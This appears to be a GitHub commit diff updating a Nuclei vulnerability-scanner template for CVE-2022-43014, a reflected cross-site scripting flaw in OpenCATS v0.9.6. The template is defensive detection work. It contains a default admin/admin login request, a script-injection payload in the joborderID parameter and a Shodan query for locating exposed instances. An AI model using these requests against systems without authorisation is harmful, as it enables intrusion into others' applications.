Update CVE-2022-43014.yaml

patch-1
Ritik Chaddha 2022-10-25 14:59:18 +05:30 committed by GitHub
parent facef96006
commit 56edbe25db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 6 deletions

View File

@ -1,18 +1,20 @@
id: CVE-2022-43014
info:
name: OpenCATS - Cross Site Scripting
name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-43014
classification:
cve-id: CVE-2022-43014
metadata:
verified: true
shodan-query: title:"OpenCATS"
tags: cve,cve2022,xss,opencats
tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
@ -21,14 +23,19 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
username={{username}}&password={{password}}
- |
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
payloads:
username:
- admin
password:
- admin
attack: pitchfork
cookie-reuse: true
matchers-condition: and
matchers: